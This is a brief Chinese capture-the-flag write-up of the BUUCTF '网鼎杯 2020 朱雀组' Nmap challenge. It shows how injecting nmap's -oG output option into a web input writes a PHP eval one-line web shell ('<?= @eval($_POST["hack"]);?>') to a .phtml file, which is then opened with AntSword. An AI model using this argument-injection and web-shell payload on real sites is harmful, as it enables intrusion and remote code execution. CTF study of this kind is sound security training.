BUUCTF [网鼎杯 2020 朱雀组]Nmap nmap工具的使用

打开靶机

 

一开始很懵，以为要用 | 来拼接命令，研究了一会之后发现居然是利用nmap的功能来写入木马...

先猜执行语句

 

 

 

nmap xxx.xxx.xxx.xxx

关于nmap保存文件的方式,有几种主流方式

-oG:grep保存

-oN:正常保存

-oX：xml格式保存

-oA：将扫描结果以标准格式、XML格式和Grep格式一次性保存，分别放在.nmap，.xml和.gnmap文件中

先尝试-oN保存一个

 

 

 

 

 

保存成功，尝试写入一句话木马：<?php @eval($_POST["hack"])?;>

 

 

 

 

 对php字段有过滤，改用' <?= @eval($_POST["hack"]);?> -oG hack2.phtml '，此处单引号的作用为拼接，-oG更加适合连接与bash工作

 

 

 

 

 

 

 

 上传成功，用蚁剑连接

 

 

 得到flag